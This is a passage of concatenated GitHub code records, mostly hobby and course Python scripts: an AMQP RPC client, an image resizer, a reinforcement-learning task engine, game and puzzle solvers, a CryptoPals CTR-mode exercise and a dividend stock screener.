self.routing_key = routing_key\n self.correlation_id = correlation_id\n self.reqgen = _RequestGenerator()\n self.formatter = formatter\n\n def client(self, server_name):\n return _Client(server_name, self.channel, self.reqgen,\n self.routing_key, self.correlation_id, self.formatter)\n\n\nclass _Client:\n \"\"\"Represents RPC client.\n \"\"\"\n\n def __init__(self, srvname, channel, reqgen, routing_key, correlation_id,\n formatter):\n self.srvname = srvname\n self.channel = channel\n self.reqgen = reqgen\n self.routing_key = routing_key\n self.correlation_id = correlation_id\n self.formatter = formatter\n\n def __getattr__(self, name):\n reply_to = \"{0}.{1}\".format(self.srvname, name)\n\n async def call(args):\n request = self.reqgen()\n\n properties = {\n \"correlation_id\": self.correlation_id,\n \"reply_to\": reply_to,\n \"message_id\": str(request.num)\n }\n\n await self.channel.basic_publish(\n exchange_name=\"\",\n routing_key=self.routing_key,\n payload=self.formatter.pack(args),\n properties=properties)\n\n await asyncio.wait_for(request.event.wait(), timeout=60)\n\n if \"error\" in request.response.headers:\n raise RPCError(request.response.headers[\"error\"])\n\n return request.response.body\n\n setattr(self, name, call)\n return call\n\n\nclass RPCError(Exception):\n \"\"\"Represents RPC error.\n \"\"\"\n pass","repo_name":"vbogretsov/py-amqprpc","sub_path":"amqprpc.py","file_name":"amqprpc.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34458959998","text":"import os\nfrom PIL import Image\n\n\nclass ImageResizer:\n def __init__(self):\n project_path = os.path.abspath(os.curdir)\n folder_path = \"train\"\n self.dataset_path = os.path.join(project_path, f\"input/{folder_path}\")\n self.output_path = os.path.join(project_path, f\"output/{folder_path}\")\n self.targeted_size = (800, 600)\n self.targeted_extension = [\".JPG\", \".jpg\"]\n\n def get_files_in_dataset(self):\n folder_path = self.dataset_path\n\n file_paths = []\n if not os.path.isdir(folder_path):\n return file_paths\n\n for file in sorted(os.listdir(folder_path)):\n file_name, extension = os.path.splitext(file)\n if extension not in self.targeted_extension:\n continue\n\n file_path = os.path.join(folder_path, file)\n if os.path.isfile(file_path):\n file_paths.append(file_path)\n return file_paths\n\n def resize_image(self, file_path):\n file_name = os.path.basename(file_path)\n save_file_path = os.path.join(self.output_path, file_name)\n\n with Image.open(file_path) as img:\n img.load()\n image = img.resize(self.targeted_size, Image.LANCZOS) # Image.Resampling.LANCZOS\n image.save(save_file_path, quality=100)\n\n print(image.size)\n\n def resize_image_with_crop(self, file_path):\n file_name = os.path.basename(file_path)\n save_file_path = os.path.join(self.output_path, file_name)\n\n with Image.open(file_path) as img:\n img.load()\n\n width, height = img.size\n new_width, new_height = self.targeted_size\n\n width_precision = 0\n height_precision = 0\n if width % 2 == 1:\n width -= 1\n width_precision = 1\n if height % 2 == 1:\n height -= 1\n height_precision = 1\n # precision will be for odd pixels, add one pixel only one side\n\n left_right_px = (width - new_width) // 2\n up_bottom_px = (height - new_height) // 2\n\n left = 0 + left_right_px + width_precision\n upper = 0 + up_bottom_px\n right = width - left_right_px\n lower = height - up_bottom_px + height_precision\n\n image = img.crop((left, upper, right, lower))\n image.save(save_file_path, quality=100)\n\n # new_size = (800, 600)\n # image = img.resize(new_size, Image.LANCZOS) # Image.Resampling.LANCZOS\n # image.save(save_file_path, quality=100)\n\n print(image.size)\n\n def process_folder(self):\n image_files = self.get_files_in_dataset()\n for file in image_files:\n self.resize_image_with_crop(file)\n\n\nif __name__ == '__main__':\n image_resizer = ImageResizer()\n image_resizer.process_folder()\n","repo_name":"SaimumIslam/Image-resizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35763948940","text":"import sqlite3\nimport os\nimport re\nimport time\nfrom ray.tune import Stopper\nfrom SuperSonic.policy_definition.Algorithm import *\nfrom SuperSonic.utils.engine.config_search import ConfigSearch\nimport SuperSonic\nimport SuperSonic.utils.environments.CSR_env\n\n\nclass TimeStopper(Stopper):\n \"\"\"A :class: An interface for implementing a Tune experiment stopper.\"\"\"\n\n def __init__(self, deadline):\n \"\"\"Create the TimeStopper object.\n Stops the entire experiment when the time has past deadline\n \"\"\"\n self._start = time.time()\n self._deadline = deadline # set time\n\n def __call__(self, trial_id, result):\n \"\"\"Returns true if the trial should be terminated given the result.\"\"\"\n\n return False\n\n def stop_all(self):\n \"\"\"Returns true if the experiment should be terminated.\"\"\"\n\n return time.time() - self._start > self._deadline\n\n\nclass CustomStopper(Stopper):\n \"\"\"A :class: An interface for user customization implementing a Tune experiment stopper.\"\"\"\n\n def __init__(self, obs_file):\n \"\"\"Create the TimeStopper object.\n Stops the entire experiment when the time has past deadline\n :param obs_file: the shared file location.\n \"\"\"\n self.obs_file = obs_file\n self.should_stop = False\n self._start = time.time()\n self._deadline = 80\n\n def __call__(self, trial_id, result):\n \"\"\"Returns true if the trial should be terminated given the result.\"\"\"\n\n # if not self.should_stop and time.time() - self._start > self.deadline:\n if not self.should_stop and os.path.exists(self.obs_file):\n os.remove(self.obs_file)\n with os.popen(f'netstat -nutlp | grep \"50055\"') as r:\n result = r.read()\n PID = []\n for line in result.split(\"\\n\"):\n if r\"/\" in line:\n PID.extend(re.findall(r\".*?(\\d+)\\/\", line))\n PID = list(set(PID))\n for pid in PID:\n try:\n os.system(f\"kill -9 {pid}\")\n except Exception as e:\n print(e)\n\n self.should_stop = True\n\n return self.should_stop\n\n def stop_all(self):\n \"\"\"Returns whether to stop trials and prevent new ones from starting.\"\"\"\n return self.should_stop\n\n\nclass CSR:\n def __init__(self, policy, data=\"\", training_iterations=50):\n \"\"\"A :class:\n A interface to run CSR.\n To apply a tuned RL, SuperSonic creates a session to apply a standard RL loop to minimize the code size\n by using the chosen RL exploration algorithms to determines which pass to be added into or removed from\n the current compiler pass sequence.\n \"\"\"\n # database\n # rootpath = os.path.abspath('../SQL/supersonic.db')\n # print(rootpath)\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n self.sql_path = os.path.abspath(\"./SuperSonic/SQL/supersonic.db\")\n # self.sql_path = os.path.abspath(\"/home/huanting/supersonic/SUPERSONIC/SuperSonic/SQL/supersonic.db\")\n\n conn = sqlite3.connect(self.sql_path)\n c = conn.cursor()\n try:\n c.execute(\n \"\"\"CREATE TABLE CSR\n (\n TIME FLOAT NOT NULL,\n BENCHMARK TEXT NOT NULL,\n RESULT TEXT NOT NULL,\n REWARD FLOAT NOT NULL,\n PRIMARY KEY ('TIME'));\"\"\"\n )\n print(\"Table created successfully\")\n except:\n pass\n conn.commit()\n conn.close()\n self.training_iterations = training_iterations\n self.deadline = 5\n self.environment_path = SuperSonic.utils.environments.CSR_env.csr_rl\n self.state_function = policy[\"StatList\"]\n self.action_function = policy[\"ActList\"]\n self.reward_function = policy[\"RewList\"]\n self.algorithm = policy[\"AlgList\"]\n self.experiment = \"csr\"\n self.local_dir = os.path.abspath(\"./SuperSonic/logs/model_save\")\n self.benchmark = data\n self.seed = \"0xCC\"\n self.log_path = os.path.abspath(\"./CSR/result\")\n self.pass_path = os.path.abspath(\"./CSR/pass\")\n\n # stopper = TimeStopper(self.deadline)\n stopper = {\"time_total_s\": self.deadline}\n self.task_config = {\n \"sql_path\": self.sql_path,\n \"benchmark\": self.benchmark,\n \"seed\": self.seed,\n \"log_path\": self.log_path,\n \"pass_path\": self.pass_path,\n \"deadline\": self.deadline,\n \"stop\": stopper,\n \"state_function\": self.state_function,\n \"action_function\": self.action_function,\n \"reward_function\": self.reward_function,\n \"algorithm\": self.algorithm,\n \"experiment\": self.experiment,\n \"local_dir\": self.local_dir,\n \"training_iterations\": self.training_iterations,\n }\n # self.environment_path = \"tasks.src.opt_test.MCTS.environments.halide_env.HalideEnv_PPO\"\n\n def startclient(self):\n pass\n\n def sql(self):\n \"\"\"Database connection\"\"\"\n conn = sqlite3.connect(\"./SuperSonic/SQL/supersonic.db\")\n print(\"Opened database successfully\")\n\n def run(self):\n \"\"\"To start RL agent with specific policy strategy and parameters\"\"\"\n RLAlgorithms(self.task_config).Algorithms(\n self.algorithm, self.task_config, self.environment_path\n )\n\n def Config(self, iterations):\n best_config = ConfigSearch(self.task_config).Algorithms(\n self.algorithm, self.task_config, self.environment_path, iterations\n )\n return best_config\n\n # def main(self):\n # # CSR.sql(self)\n # # CSR.startserve(self)\n # CSR.run(self)\n\n\nclass TaskEngine:\n \"\"\"A :class: An interface to run specific Task environment and agent.\"\"\"\n\n def __init__(self, policy):\n \"\"\"An interface to start environment and agent.\n\n :param policy: including \"state_function\", \"action_function\", \"reward_function\", \"observation_space\" transition\n methods.\n :param tasks_name: The task developer intend to optimize.\n \"\"\"\n\n self.policy = policy\n\n def run(self, policy, task=\"CSR\", data=\"\", training_iterations=20):\n if task == \"CSR\":\n CSR(policy, data, training_iterations).run()\n\n def Config(\n self, policy, task=\"CSR\", iterations=2, benchmark=\"\", training_iterations=20\n ):\n global best_config\n if task == \"CSR\":\n best_config = CSR(policy, benchmark, training_iterations).Config(iterations)\n\n return best_config\n","repo_name":"HuantWang/SUPERSONIC","sub_path":"SuperSonic/utils/engine/tasks_engine.py","file_name":"tasks_engine.py","file_ext":"py","file_size_in_byte":6767,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"37"} +{"seq_id":"29977404021","text":"import minerl\nimport torch\nimport numpy as np\nimport gym\n\nclass continousEnv(minerl.env.core.MineRLEnv):\n def __init__(self, xml):\n super().__init__(\n xml,\n gym.spaces.Box(low=0, high=255, shape=(64, 64, 3), dtype=np.uint8),\n gym.spaces.Box(low=-1, high=1, shape=(5,), dtype=np.uint8),\n None\n )\n def _setup_spaces(self, observation_space, action_space):\n self.observation_space = observation_space\n self.action_space = action_space\n\n def _process_action(self, action_in) -> str:\n a = action_in\n command_array = [f'move {a[0]}', f'jump {a[1]}', f'attack {a[2]}', f'camera {a[3]} {a[4]}'] \n\n print(\"\\n\".join(command_array), \"\\n\")\n return \"\\n\".join(command_array)\n\n def _process_observation(self, pov, info):\n\n pov = np.frombuffer(pov, dtype=np.uint8)\n pov = pov.reshape((self.height, self.width, self.depth))\n return pov","repo_name":"ysarda/minezero","sub_path":"env_wrappers.py","file_name":"env_wrappers.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38601296539","text":"DoubleBuffer = None\nDummyProcessor = None\nExternalProcessor = None\n\ndef alias():\n global DoubleBuffer, DummyProcessor, ExternalProcessor\n DoubleBuffer = double_buffer.DoubleBuffer\n DummyProcessor = dummy.DummyProcessor\n ExternalProcessor = external_processor.ExternalProcessor\n\nif '__imported__' in locals():\n import imp\n imp.reload(double_buffer)\n imp.reload(external_processor)\n imp.reload(dummy)\n alias()\nelse:\n __imported__ = True\n from . import double_buffer\n from . import external_processor\n from . import dummy\n alias()\n","repo_name":"Kupoman/BlenderRealtimeEngineAddon","sub_path":"brte/processors/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"37"} +{"seq_id":"70172127467","text":"import base64\nimport sys\nsys.path.insert(1, \"../../\")\nimport helperFunctions as helper\nimport set1.chall_6.breakRepeatingKeyXor as Vigenere\nimport set1.chall_3.singleByteXor as SingleByteXor\nimport set3.chall_18.implementCtrMode as AES_CTR\n\n\ndef generateCts(ipFile):\n key = helper.getRandBytes(16)\n nonce = 0\n cts = []\n for line in ipFile:\n pt = line[:len(line)-1]\n pt = base64.b64decode(pt)\n ct = AES_CTR.AES_CTR(pt, key, nonce)\n cts.append(ct)\n return cts\n\n\ndef breakEnc(cts):\n minLen = 1000\n lines = 0\n pts = []\n for x in cts:\n if len(x) < minLen:\n minLen = len(x)\n vigenereInput = bytes(''.encode('utf-8'))\n for x in cts:\n vigenereInput += x[:minLen]\n lines += 1\n vigenerePt = Vigenere.breakRepeatingKeyXor(vigenereInput)\n\n for i in range(lines):\n known = bytes(\"Known: \".encode('utf-8'))\n unknown = bytes(\" Unknown: \".encode('utf-8'))\n ct = cts[i]\n pt = known + vigenerePt[i*16:(i+1)*16] + unknown + ct[minLen:]\n pts.append(pt)\n\n return pts\n\n\ndef breakEnc2(cts):\n maxLen = -1\n noOfCts = len(cts)\n for x in cts:\n if len(x) > maxLen:\n maxLen = len(x)\n pts = [bytes(''.encode('latin1')) for i in range(noOfCts)]\n for i in range(maxLen):\n ctInput = bytes(''.encode('latin1'))\n for j in range(noOfCts):\n if i < len(cts[j]):\n ctInput += bytes([cts[j][i]])\n ptOutput = SingleByteXor.identifySingleByteXor(ctInput.hex())\n ptIndex = 0\n for j in range(noOfCts):\n if i < len(cts[j]):\n if ptOutput[0][1][ptIndex] == 0:\n pts[j] += bytes(' '.encode('latin1'))\n else:\n pts[j] += bytes([ptOutput[0][1][ptIndex]])\n ptIndex += 1\n return pts\n\n\ndef main():\n ipFile = open(\"input.txt\", 'r')\n cts = generateCts(ipFile)\n ipFile.close()\n pts = breakEnc2(cts)\n for x in pts:\n print(x)\n\n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set3/chall_19/breakFixedNonceCtrUsingSubstitutions.py","file_name":"breakFixedNonceCtrUsingSubstitutions.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36099878890","text":"#########################\n## Advent of Code 2020 ##\n#########################\n# Steven Small #\n# stvnsmll #\n# 05.12.20 #\n# #\n# Day 5, Part 1 #\n#########################\n\n\ndef main(test):\n if test == 't':\n testing = 1\n input_file = \"./d05/seatplan_testing.txt\"\n else:\n testing = 0\n input_file = \"./d05/seatplan.txt\"\n\n # Using readline()\n seatplan_file = open(input_file, 'r')\n seatcount = 0\n maxseatID = 0\n\n while True:\n # Get next line from file\n seatdata = seatplan_file.readline().strip()\n\n # if line is empty end of file is reached\n if not seatdata:\n break\n\n # print(seatdata)\n seatrow = seatdata[:-3]\n seatcol = seatdata[-3:]\n seatID = getseatID(seatrow, seatcol)\n # print(\"Row Info: \" + seatrow + \", Col Info: \" + seatcol)\n # print(\" Seat ID: \" + str(seatID) + \"\\n\")\n if seatID > maxseatID:\n maxseatID = seatID\n\n seatcount += 1\n\n seatplan_file.close()\n\n\n print(\"\\nHighest Seat ID:\", maxseatID)\n print(\"Total Seat Count:\", seatcount)\n\n print('\\n\\ndone')\n return maxseatID\n\ndef getseatID(row, col):\n minrow = 0\n maxrow = 128\n rowmid = 0\n for code in row:\n # print(\"Min: \" + str(int(minrow)) + \", Max: \" + str(int(maxrow)))\n rowmid = (minrow + maxrow) / 2\n # print(\" Mid: \" + str(int(rowmid)))\n # print(code)\n if code == \"F\":\n maxrow = rowmid\n else:\n minrow = rowmid\n if row[:-1] == \"F\":\n row = maxrow\n else:\n row = minrow\n # print(int(row))\n\n mincol = 0\n maxcol = 8\n colmid = 0\n for code in col:\n # print(code)\n colmid = (mincol + maxcol) / 2\n # print(colmid)\n if code == \"L\":\n maxcol = colmid\n else:\n mincol = colmid\n col = (mincol + maxcol) / 2\n\n seatID = (row * 8) + col\n\n return int(seatID)\n\n\n\nif __name__ == \"__main__\":\n main(\"r\")","repo_name":"stvnsmll/AoC","sub_path":"AoC_2020/d05/AoC2020_05_1.py","file_name":"AoC2020_05_1.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31335135624","text":"class ListaException(Exception):\n def __init__(self, msg):\n super().__init__(msg)\n\n\n\n\nclass ListaSequencial:\n\n def __init__(self):\n self.__dados = []\n \n def vazia(self):\n return len(self.__dados) == 0\n \n\n# def cheia(self):\n# pass\n\n def tamanho(self):\n return len(self.__dados)\n\n def busca(self, dado):\n '''\n for i in range(self.__dados):\n if self.__dados[i] == dado:\n return i+1\n return None\n '''\n try:\n return self.__dados.index(dado) + 1\n except ValueError:\n raise ListaException(f'O valor {dado} não se encontra na lista')\n except:\n raise\n\n\n\n\n\n # operacao que recebe a posicao de um elemento da lista e retorna\n # o conteúdo (dado) que está armazenado\n def elemento(self, posicao):\n # valor negativo?\n # posicao invalida IndexError\n # posicao com o tipo de dado diferente de int TypeError\n try:\n assert posicao > 0\n return self.__dados[posicao-1]\n except TypeError:\n raise ListaException('O argumento posicao deve ser um valor do tipo inteiro')\n except IndexError:\n raise ListaException('A posicao informada para consulta é inválida')\n except AssertionError:\n raise ListaException('Posicao negativa não é válida para a lista')\n except:\n raise\n\n # função que insere um dado na lista na posicao indicada (posição válida)\n def inserir(self, posicao, dado):\n try:\n assert posicao > 0\n self.__dados.insert(posicao-1, dado)\n except TypeError:\n raise ListaException('O argumento posicao deve ser um valor do tipo inteiro')\n except IndexError:\n raise ListaException('A posicao informada para consulta é inválida')\n except AssertionError:\n raise ListaException('Posicao negativa não é válida para a lista')\n except:\n raise\n\n # operação que remove um elemento da lista e retorna seu valor\n def remover(self, posicao):\n try:\n assert posicao > 0\n if( self.vazia()):\n raise ListaException('Lista Vazia. Não é possível remover elementos')\n valor = self.__dados[posicao-1]\n del self.__dados[posicao-1]\n return valor\n except TypeError:\n raise ListaException('O argumento posicao deve ser um valor do tipo inteiro')\n except IndexError:\n raise ListaException('A posicao informada para consulta é inválida')\n except AssertionError:\n raise ListaException('Posicao negativa não é válida para a lista')\n except:\n raise\n\n # método especial que retorna a descrição interna do objeto\n def __str__(self):\n return self.__dados.__str__()\n \n # método que imprime o conteúdo da Lista Sequencial\n def imprimir(self):\n print(self.__str__())\n\n # método que altera o conteúdo armazenado em uma determinada posição da lista\n def modificar(self, posicao, novoValor):\n try:\n assert posicao > 0\n if( self.vazia()):\n raise ListaException('Lista Vazia. Não é possível remover elementos')\n self.__dados[posicao-1] = novoValor\n return True\n except TypeError:\n raise ListaException('O argumento posicao deve ser um valor do tipo inteiro')\n except IndexError:\n raise ListaException('A posicao informada para consulta é inválida')\n except AssertionError:\n raise ListaException('Posicao negativa não é válida para a lista')\n except:\n raise\n\n# testando se a Lista Sequencial está atuando como um módulo (biblioteca) ou se o \nif (__name__ == '__main__'):\n print('Rodando o programa principal a partir da classe ListaSequencial')\n l1 = ListaSequencial()\n if (l1.vazia()):\n print('Lista está vazia')\n \n print('Tamanho: ', l1.tamanho())\n\n for i in range(10):\n l1.inserir(1,i*10)\n print(l1)\n\n valor = l1.remover(2)\n print(valor)\n print(l1)\n\n print()\n l1.imprimir()\n l1.modificar(5,44)\n l1.imprimir()\n\n #l1.inserir(-10,99)\n print(l1)\n\n try:\n #print(l1.busca(55))\n #print(l1.elemento(5))\n #l1.inserir(5,111)\n #l1.remover(1)\n l1.modificar(100, 999)\n print(l1)\n except ListaException as li:\n print(li)\n \n\n","repo_name":"gabrielmacaubas/IFPB","sub_path":"ED/semana-08/ListaSequencialPreparativo.py","file_name":"ListaSequencialPreparativo.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38392154255","text":"# Lunar Lander: AI-controlled play\n\n# Instructions:\n# Land the rocket on the platform within a distance of plus/minus 20, \n# with a horizontal and vertical speed less than 20\n#\n# Controlling the rocket:\n# arrows : Turn booster rockets on and off\n# r : Restart game\n# q / ESC : Quit\n\nfrom LunarLander import *\nimport time\nimport numpy\n\nenv = LunarLander()\nenv.reset()\nexit_program = False\nepisodes = 100000\nrender = False\n# while not exit_program:\nwon = 0\nlost = 0\nend_position = []\nrewards = []\ntime_taken = []\nfor i in range(episodes):\n env.reset()\n done = False\n start_time = time.time()\n while not done:\n if render:\n env.render()\n (x, y, xspeed, yspeed), reward, done = env.step((boost, left, right))\n\n boost = False\n left = False\n right = False\n\n max_speed = min(40, max(abs(x), 10))\n x_limit = 15\n\n if xspeed > max_speed:\n right = True\n if xspeed < -max_speed:\n left = True\n\n if x > x_limit and not left:\n right = True\n elif x < - x_limit and not right:\n left = True\n\n\n # maksimal y fart\n if yspeed > 60:\n boost = True\n\n # boost grænse\n if y < 120:\n boost = True\n\n # Process game events\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_program = True\n if event.type == pygame.KEYDOWN:\n if event.key in [pygame.K_ESCAPE, pygame.K_q]:\n exit_program = True\n if event.key == pygame.K_UP:\n boost = True\n if event.key == pygame.K_DOWN:\n boost = False\n if event.key == pygame.K_RIGHT:\n left = False if right else True\n right = False\n if event.key == pygame.K_LEFT:\n right = False if left else True\n left = False\n if event.key == pygame.K_r:\n boost = False\n left = False\n right = False\n env.reset()\n if abs(x) <= 20 and abs(xspeed) <= 20 and abs(yspeed) <= 20:\n won += 1\n else:\n lost += 1\n\n time_taken.append((time.time() - start_time)*1000)\n\n rewards.append(reward)\n end_position.append((x,y))\nnp.save('won.npy', won)\nnp.save('lost.npy', lost)\nnp.save('rewards.npy', rewards)\nnp.save('time_taken.npy', time_taken)\nnp.save('end_position.npy', end_position)\n\nenv.close()\n\n# x er positiv til højre for platformen og negativ til venstre for\n# xspeed er positiv gående mod højre og negativ gående mod venstre\n\n# hvor lang tid tager det\n# gennemsnitlig score\n# hvor præcist den lander","repo_name":"kriskruse/Lunar-Lander-AI","sub_path":"AI_LunarLander.py","file_name":"AI_LunarLander.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71861879788","text":"import requests\nimport subprocess\nfrom pathlib import Path\nimport os\nimport numpy as np\nimport csv\nimport time\nfrom pip._internal import main as pip\n\ntry:\n import yfinance as yf\nexcept:\n pip(['install', '--user', 'yfinance'])\nfinally:\n import yfinance as yf\n\ntry:\n from tabulate import tabulate\nexcept:\n pip(['install', '--user', 'tabulate'])\nfinally:\n from tabulate import tabulate\n\ntry:\n from progressbar import ProgressBar\nexcept:\n pip(['install', '--user', 'progressbar'])\nfinally:\n from progressbar import ProgressBar, AdaptiveETA, Bar, Percentage\nDataStore = \"DataStore\"\nOutputStore = \"Output\"\nsheetName = os.path.join(DataStore, 'FreeTradeStockUniverse.csv')\nmainStore = os.path.join(DataStore, 'DataStore.csv')\nrejectStore = os.path.join(DataStore, \"rejected.csv\")\nlistStore = os.path.join(DataStore, \"listStore.csv\")\nStockListURL = 'http://freetrade.io/stock-universe'\nsheetUrl = 'https://docs.google.com/spreadsheets/d/1-5eYQWyWLyRCiqgHpiqjSmCayLjODvDvVEHWRjW5VjM/export?format=csv&id=1-5eYQWyWLyRCiqgHpiqjSmCayLjODvDvVEHWRjW5VjM'\nsheetData = ''\nlistData = []\nDividendStockListStored = []\nrejectedStockList = []\n\nclass Stock:\n def __init__(self, name, shortDescription, ticker, assetClass, currency, isin, longDescription, dYield=None, dGrowthRate=None, peRatio=None):\n self.name = name\n self.shortDescription = shortDescription\n self.ticker = ticker\n self.assetClass = assetClass\n self.currency = currency\n self.isin = isin\n self.longDescription = longDescription\n self.dYield = dYield\n self.dGrowthRate = dGrowthRate\n self.peRatio = peRatio\n try:\n self.yfData = yf.Ticker(ticker)\n except:\n self.yfData = 0\n\n\nclass FilterType:\n def __init__(self, name, dYield=None, dGrowthRate=None, peRatio=None):\n self.name = name\n self.dYield = dYield\n self.dGrowthRate = dGrowthRate\n self.peRatio = peRatio\n self.outputName = name + \".csv\"\n\n\ndefaultListData = [\n FilterType(\"cream\", 0.03, 0.04, 25),\n FilterType(\"highYield\", 0.05, None, None),\n FilterType(\"highYieldGrowth\", 0.05, 0.04, 25),\n FilterType(\"dividendGrowth\", 0.024, 0.035, 40)\n]\n\nclear = lambda: subprocess.call('cls||clear', shell=True)\n\ndef getSheet():\n response = requests.get(sheetUrl)\n assert response.status_code == 200, 'Wrong status code'\n return response.content.decode(\"utf-8\")\n\n\ndef saveCsv(content, name):\n sheetHandle = open(name, 'w')\n sheetHandle.write(content)\n sheetHandle.close()\n\n\ndef sheetToStockList(fileName):\n StockList = []\n with open(fileName, 'r') as sheet:\n reader = csv.reader(sheet)\n dumbList = list(reader)\n for row in dumbList:\n if(row[0] == \"Name\"):\n continue\n StockList.append(Stock(row[0], row[1], row[2], row[3], row[4], row[5], row[6]))\n return StockList\n\n\ndef outputSheetToStockList(fileName):\n StockList = []\n with open(fileName, 'r') as sheet:\n reader = csv.reader(sheet)\n dumbList = list(reader)\n for row in dumbList:\n if(row[0] == \"Name\"):\n continue\n StockList.append(Stock(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9]))\n return StockList\n\n\ndef dividendGrowthRate(stock):\n divs = stock.yfData.dividends.values\n if(len(divs) < 2):\n return 'skip'\n growth_rate = np.mean(np.exp(np.diff(np.log(divs))) - 1)\n return growth_rate\n\n\ndef init():\n global sheetData\n global DividendStockListStored\n global rejectedStockList\n clear()\n print(\"Initialising BoneMeal...\")\n if not (Path.exists(Path(DataStore))):\n os.mkdir(DataStore)\n if not (Path.exists(Path(OutputStore))):\n os.mkdir(OutputStore)\n try:\n with open(sheetName, 'r') as sheetCurrentHandle:\n print(\"Checking for updates to Freetrade Stock Universe...\")\n try:\n sheetCurrent = sheetCurrentHandle.read().replace('\\r\\n', '\\n')\n sheet = getSheet().replace('\\r\\n', '\\n')\n if not (sheetCurrent == sheet):\n print(\"Update found!\")\n print(\"Applying update..\")\n saveCsv(sheet, sheetName)\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n print(\"Update applied!\")\n except:\n print(\"Couldn't get new sheet, skipping update\")\n except:\n print(\"FreeTrade Stock Uninverse not found\")\n print(\"getting it...\")\n sheet = getSheet()\n saveCsv(sheet, sheetName)\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n finally:\n print(\"Got FreeTrade Stock Universe!\")\n sheetHandle = open(sheetName, 'r')\n sheetData = sheetHandle.read()\n sheetHandle.close()\n\n\n try:\n _ = open(mainStore, 'r')\n _ = open(rejectStore, \"r\")\n except:\n if(Path.exists(Path(mainStore))):\n os.remove(mainStore)\n if(Path.exists(Path(rejectStore))):\n os.remove(rejectStore)\n print(\"Dividend data for stocks not found\")\n print(\"getting it...\")\n stockList = sheetToStockList(sheetName)\n dividendStockList(stockList)\n finally:\n print(\"Got dividend data for stocks!\")\n DividendStockListStored = outputSheetToStockList(mainStore)\n rejectedStockList = outputSheetToStockList(rejectStore)\n\n print(\"Initialisation complete!\")\n\n\ndef getYDGPEforStock(stock):\n dYield = 0\n dGrowthRate = 0\n peRatio = 0\n ticker = stock.ticker\n try:\n dYield = stock.yfData.info['trailingAnnualDividendYield']\n except:\n if(stock.currency=='GBP'):\n ticker = stock.ticker+'.L'\n stock.yfData = yf.Ticker(stock.ticker+'.L')\n try:\n dYield = stock.yfData.info['trailingAnnualDividendYield']\n except:\n return 'skip'\n else:\n return 'skip'\n\n try:\n dGrowthRate = dividendGrowthRate(stock)\n if(dGrowthRate == 'skip'):\n return 'skip'\n except:\n return 'skip'\n\n try:\n peRatio = stock.yfData.info['trailingPE']\n except:\n peRatio = '?'\n\n return {'dYield': dYield, 'dGrowthRate': dGrowthRate, 'peRatio': peRatio, 'ticker': ticker}\n\n\ndef dividendStockList(stockList):\n widgets = [Percentage(),\n ' ', Bar(),\n ' ', AdaptiveETA()]\n pBar = ProgressBar(widgets=widgets)\n dStockList = []\n print(\"populating stocks with dividend data..\")\n rejectedStockList = []\n for stock in pBar(stockList):\n data = getYDGPEforStock(stock)\n if(data == 'skip'):\n rejectedStockList.append(stock)\n else:\n stock.dYield = data['dYield']\n stock.dGrowthRate = data['dGrowthRate']\n stock.peRatio = data['peRatio']\n stock.ticker = data['ticker']\n dStockList.append(stock)\n writeOuputCsv(dStockList, mainStore, isDataStore=True)\n writeOuputCsv(rejectedStockList, rejectStore, isDataStore=True)\n return dStockList\n\n\ndef stockToList(stock):\n return [stock.name, stock.shortDescription, stock.ticker, stock.assetClass, stock.currency, stock.isin, stock.longDescription, stock.dYield, stock.dGrowthRate, stock.peRatio]\n\n\ndef stockListToCsvList(stockList):\n csvList = []\n header = [\"Name\", \"Short Description\", \"Ticker\", \"Asset Class\", \"Currency\", \"ISIN\", \"Long Description\", \"Yield\", \"Growth Rate\", \"PE Ratio\"]\n csvList.append(header)\n for stock in stockList:\n csvList.append(stockToList(stock))\n return csvList\n\n\ndef writeOuputCsv(stockList, filename, isDataStore=False):\n csvList = stockListToCsvList(stockList)\n if(isDataStore):\n outPath = filename\n else:\n outPath = os.path.join(OutputStore, filename)\n with open(outPath, 'w', newline='') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n for row in csvList:\n wr.writerow(row)\n\n\ndef indexOfStock(stockList, isin):\n i = 0\n for stock in stockList:\n if(stock.isin == isin):\n return i\n i += 1\n return -1\n\n\ndef filterStocklist(stockList, dYield=0.01, dGrowthRate=0, peRatio=None):\n try:\n dYield = float(dYield)\n except:\n dYield = None\n try:\n dGrowthRate = float(dGrowthRate)\n except:\n dGrowthRate = None\n try:\n peRatio = float(peRatio)\n except:\n peRatio = None\n\n filterList = []\n for stock in stockList:\n try:\n if not (dYield is None):\n if(float(stock.dYield) >= float(dYield)):\n if not (dGrowthRate is None):\n if(float(stock.dGrowthRate) >= float(dGrowthRate)):\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (peRatio is None):\n if(float(stock.peRatio) <= float(peRatio)):\n filterList.append(stock)\n else:\n filterList.append(stock)\n else:\n if not (dGrowthRate is None):\n if(float(stock.dGrowthRate) >= float(dGrowthRate)):\n if not (peRatio is None):\n 